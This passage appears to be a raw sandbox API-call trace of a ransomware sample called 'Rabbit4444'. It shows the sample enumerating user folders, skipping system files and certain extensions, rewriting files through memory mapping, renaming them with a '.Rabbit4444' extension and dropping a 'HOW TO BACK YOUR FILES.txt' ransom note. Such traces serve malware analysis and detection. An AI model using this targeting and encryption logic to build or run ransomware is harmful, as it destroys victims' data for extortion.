lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.540] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.541] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14185133810) returned 1 [0050.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0050.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.541] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.541] CloseHandle (hObject=0x298) returned 1 [0050.541] CloseHandle (hObject=0x278) returned 1 [0050.542] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\YwMCDPenkGT OtMk.m4a.Rabbit4444") returned 63 [0050.542] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\YwMCDPenkGT OtMk.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ywmcdpenkgt otmk.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\YwMCDPenkGT OtMk.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ywmcdpenkgt otmk.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.542] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x758b00e0, ftCreationTime.dwHighDateTime=0x1d4cdac, ftLastAccessTime.dwLowDateTime=0xb1402240, ftLastAccessTime.dwHighDateTime=0x1d4c9de, ftLastWriteTime.dwLowDateTime=0xb1402240, ftLastWriteTime.dwHighDateTime=0x1d4c9de, nFileSizeHigh=0x0, nFileSizeLow=0xf2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zS4b8o-pTT999 Cto.swf", cAlternateFileName="ZS4B8O~1.SWF")) returned 1 [0050.542] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.542] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.542] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="Rabbit4444.exe") returned 1 [0050.542] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2=".") returned 1 [0050.542] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="..") returned 1 [0050.543] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="windows") returned 1 [0050.543] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="bootmgr") returned 1 [0050.543] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="pagefile.sys") returned 1 [0050.543] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="boot") returned 1 [0050.543] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="ids.txt") returned 1 [0050.543] lstrcmpiW (lpString1="zS4b8o-pTT999 Cto.swf", lpString2="NTUSER.DAT") returned 1 [0050.543] lstrcpyW (in: lpString1=0x130eb78, lpString2="zS4b8o-pTT999 Cto.swf" | out: lpString1="zS4b8o-pTT999 Cto.swf") returned="zS4b8o-pTT999 Cto.swf" [0050.543] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\zS4b8o-pTT999 Cto.swf", dwFileAttributes=0x0) returned 1 [0050.543] lstrlenW (lpString="zS4b8o-pTT999 Cto.swf") returned 21 [0050.543] lstrlenW (lpString="Rabbit4444") returned 10 [0050.543] lstrcmpiW (lpString1="99 Cto.swf", lpString2="Rabbit4444") returned -1 [0050.543] lstrlenW (lpString=".dll") returned 4 [0050.543] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0050.543] lstrlenW (lpString=".lnk") returned 4 [0050.543] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0050.543] lstrlenW (lpString=".ini") returned 4 [0050.543] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0050.543] lstrlenW (lpString=".sys") returned 4 [0050.543] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0050.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\zS4b8o-pTT999 Cto.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zs4b8o-ptt999 cto.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.543] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.543] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14185409890) returned 1 [0050.543] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=62167) returned 1 [0050.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0050.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0050.544] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf5e0, lpName=0x0) returned 0x298 [0050.544] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf5e0) returned 0x70000 [0050.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.545] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.546] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14185637322) returned 1 [0050.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0050.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0050.546] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.547] CloseHandle (hObject=0x298) returned 1 [0050.547] CloseHandle (hObject=0x278) returned 1 [0050.549] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\zS4b8o-pTT999 Cto.swf.Rabbit4444") returned 64 [0050.549] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\zS4b8o-pTT999 Cto.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zs4b8o-ptt999 cto.swf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\zS4b8o-pTT999 Cto.swf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zs4b8o-ptt999 cto.swf.rabbit4444"), dwFlags=0x1) returned 1 [0050.549] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dd54e0, ftCreationTime.dwHighDateTime=0x1d4c601, ftLastAccessTime.dwLowDateTime=0x4cbfe390, ftLastAccessTime.dwHighDateTime=0x1d4d524, ftLastWriteTime.dwLowDateTime=0x4cbfe390, ftLastWriteTime.dwHighDateTime=0x1d4d524, nFileSizeHigh=0x0, nFileSizeLow=0x1674e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZuEh.wav", cAlternateFileName="")) returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="Rabbit4444.exe") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2=".") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="..") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="windows") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="bootmgr") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="pagefile.sys") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="boot") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="ids.txt") returned 1 [0050.549] lstrcmpiW (lpString1="ZuEh.wav", lpString2="NTUSER.DAT") returned 1 [0050.549] lstrcpyW (in: lpString1=0x130eb78, lpString2="ZuEh.wav" | out: lpString1="ZuEh.wav") returned="ZuEh.wav" [0050.549] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZuEh.wav", dwFileAttributes=0x0) returned 1 [0050.550] lstrlenW (lpString="ZuEh.wav") returned 8 [0050.550] lstrlenW (lpString="Rabbit4444") returned 10 [0050.550] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.550] lstrlenW (lpString=".dll") returned 4 [0050.550] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.550] lstrlenW (lpString=".lnk") returned 4 [0050.550] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.550] lstrlenW (lpString=".ini") returned 4 [0050.550] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.550] lstrlenW (lpString=".sys") returned 4 [0050.550] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.550] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZuEh.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zueh.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.550] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.550] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14186083970) returned 1 [0050.550] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91982) returned 1 [0050.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0050.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.550] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16a50, lpName=0x0) returned 0x298 [0050.550] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16a50) returned 0x70000 [0050.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.552] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.552] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.553] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.553] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14186362068) returned 1 [0050.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0050.553] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.553] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.554] CloseHandle (hObject=0x298) returned 1 [0050.554] CloseHandle (hObject=0x278) returned 1 [0050.555] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZuEh.wav.Rabbit4444") returned 51 [0050.555] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZuEh.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zueh.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ZuEh.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\zueh.wav.rabbit4444"), dwFlags=0x1) returned 1 [0050.555] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81dd54e0, ftCreationTime.dwHighDateTime=0x1d4c601, ftLastAccessTime.dwLowDateTime=0x4cbfe390, ftLastAccessTime.dwHighDateTime=0x1d4d524, ftLastWriteTime.dwLowDateTime=0x4cbfe390, ftLastWriteTime.dwHighDateTime=0x1d4d524, nFileSizeHigh=0x0, nFileSizeLow=0x1674e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZuEh.wav", cAlternateFileName="")) returned 0 [0050.555] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0050.555] lstrcpyW (in: lpString1=0x130eb78, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.556] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.556] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.557] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.557] CloseHandle (hObject=0x278) returned 1 [0050.557] CloseHandle (hObject=0x27c) returned 1 [0050.557] GetCurrentThreadId () returned 0xd98 [0050.557] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0050.557] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0050.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b6a0 | out: hHeap=0xe0000) returned 1 [0050.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0050.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0050.557] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\" [0050.557] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3" [0050.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.562] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.565] FlushFileBuffers (hFile=0x27c) returned 1 [0050.566] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.566] CloseHandle (hObject=0x27c) returned 1 [0050.566] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned 35 [0050.566] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.566] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe774a867, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0050.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.567] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.567] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.567] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.567] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe774a867, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.567] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.567] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.567] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.567] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.567] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.567] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe774a867, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe774a867, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe7770877, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.567] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.567] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.567] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="Rabbit4444.exe") returned -1 [0050.567] lstrcmpiW (lpString1="Java", lpString2=".") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="..") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="windows") returned -1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="bootmgr") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="pagefile.sys") returned -1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="boot") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="ids.txt") returned 1 [0050.567] lstrcmpiW (lpString1="Java", lpString2="NTUSER.DAT") returned -1 [0050.567] lstrcpyW (in: lpString1=0x130eb80, lpString2="Java" | out: lpString1="Java") returned="Java" [0050.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0050.567] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x52) returned 0x115b08 [0050.567] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6390 [0050.567] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0050.567] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0050.567] lstrcpyW (in: lpString1=0x130eb80, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.567] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.568] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.568] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.568] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.568] CloseHandle (hObject=0x278) returned 1 [0050.568] CloseHandle (hObject=0x27c) returned 1 [0050.568] GetCurrentThreadId () returned 0xd98 [0050.568] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0050.568] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java" [0050.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115b08 | out: hHeap=0xe0000) returned 1 [0050.568] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0050.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java" [0050.569] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\" [0050.569] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3" [0050.569] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.569] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.572] FlushFileBuffers (hFile=0x27c) returned 1 [0050.573] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.573] CloseHandle (hObject=0x27c) returned 1 [0050.573] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java") returned 40 [0050.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.573] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, 